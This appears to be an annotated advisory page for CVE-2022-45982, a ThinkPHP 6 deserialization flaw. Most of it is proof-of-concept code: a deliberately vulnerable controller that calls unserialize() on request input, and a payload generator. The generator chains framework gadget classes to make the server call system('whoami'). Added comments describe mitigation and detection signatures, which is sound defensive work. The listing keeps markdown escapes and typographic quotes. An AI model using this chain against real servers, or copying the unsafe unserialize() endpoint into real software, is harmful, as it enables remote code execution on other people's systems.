
CVE-2022-45982: CVE-2022-45982

ThinkPHP 6.0.0~6.0.13 and 6.1.0~6.1.1 contain a deserialization vulnerability. This vulnerability allows attackers to execute arbitrary code via a crafted payload.


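ThinkPHP 6.0.0-6.0.13 and 6.1.0-6.1.1 contain a deserialization vulnerability that allows attackers to execute arbitrary code via a crafted payload. The payload only takes effect where an application passes attacker-controlled data to unserialize(), as the demonstration endpoint below does.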

First, add a new deserialization endpoint, such as:

<?php namespace app\controller;

use app\BaseController;

/**
 * Deliberately vulnerable demonstration controller.
 *
 * index() hands the endpoint's $payload argument straight to unserialize()
 * and discards the result. unserialize() on untrusted bytes lets the sender
 * choose which classes are instantiated and every property value they hold,
 * so magic methods run on attacker-chosen state. Do not ship an endpoint like
 * this: accept JSON (json_decode) instead, or at minimum call
 * unserialize($payload, ['allowed_classes' => false]).
 */
class Index extends BaseController { public function index($payload) { unserialize($payload);

}

}

Now you can generate the payload with:

<?php

// Stub declarations in namespace think (Model, App, Request). They declare
// properties only, so serialize() emits objects carrying these class names and
// the values preset here. Presumably the names mirror the framework's own
// classes; confirm against the framework source.
// NOTE(review): the listing is kept as extracted from the page. Markdown
// escapes (\_, \[, \->) and typographic quotes are left untouched, so it is
// not valid PHP in this form.
// Defender takeaway: in a real payload every property below is chosen by the
// sender, so no property of an unserialized object can be trusted.
namespace think { abstract class Model { private $lazySave = true; private $data = [‘a’ => ‘b’]; private $exists = true; protected $withEvent = false; protected $readonly = [‘a’]; protected $relationWrite; private $relation; private $origin = [];

    // Stores $value in origin and relationWrite, and a self-reference in relation.
    public function \_\_construct($value)
    {
        $this\->relation = \['r' => $this\];
        $this\->origin = \["n" => $value\];
        $this\->relationWrite = \['r' =>
            \["n" => $value\]
        \];
    }
}

// Stub with a single, unset $request property.
class App
{
    protected $request;
}

// Stub with preset mergeParam, param and filter values; in a real payload
// these are whatever the sender chooses.
class Request
{
    protected $mergeParam = true;
    protected $param = \["whoami"\];
    protected $filter = "system";
}

}

// Model is declared abstract in this listing, so the script instantiates and
// serializes this empty concrete subclass instead.
namespace think\model {

use think\\Model;

class Pivot extends Model
{
}

}

// Stub named think\route\Url. Its constructor keeps the object it is given in
// $route and a fresh App stub in $app; $url and $domain are preset strings.
namespace think\route {

use think\\App;

class Url
{
    protected $url = "";
    protected $domain = "domain";
    protected $route;
    protected $app;

    public function \_\_construct($route)
    {
        $this\->route = $route;
        $this\->app = new App();
    }
}

}

// Stub named think\log\Channel. Its constructor keeps the object it is given
// in $logger; $lazy and $log are preset.
namespace think\log { class Channel { protected $lazy = false; protected $logger; protected $log = [];

    public function \_\_construct($logger)
    {
        $this\->logger = $logger;
    }
}

}

// Stub named think\session\Store. $serialize is preset to a one-element list
// holding a function name, and the constructor sets $data to a two-element
// array of the given object and the string "param".
// NOTE(review): a property that names a callable is the part to look for when
// auditing code for unserialize() gadgets: any class that calls a function
// named by its own state becomes dangerous once that state can be forged.
namespace think\session { class Store { protected $data; protected $serialize = [“call_user_func”]; protected $id = "";

    public function \_\_construct($data)
    {
        $this\->data = \[$data, "param"\];
    }
}

}

// Driver: nests the stubs (Request inside Store inside Channel inside Url
// inside Pivot) and prints the URL-encoded serialize() output. The inline
// author comments tag each object with the step it is meant to serve.
// Detection: serialized PHP objects carry their class names in clear text.
// A request parameter that URL-decodes to O:<len>:"think\model\Pivot" along
// with think\route\Url, think\log\Channel, think\session\Store and
// think\Request is a strong indicator of this chain. Legitimate clients have
// no reason to send serialized framework objects.
// Mitigation: remove unserialize() calls on untrusted input and move off the
// affected ThinkPHP ranges named in the advisory (6.0.0-6.0.13, 6.1.0-6.1.1).
namespace { $request = new think\Request(); // param $store = new think\session\Store($request); // save $channel = new think\log\Channel($store); // __call $url = new think\route\Url($channel); // __toString $model = new think\model\Pivot($url); // __destruct echo urlencode(serialize($model)); }
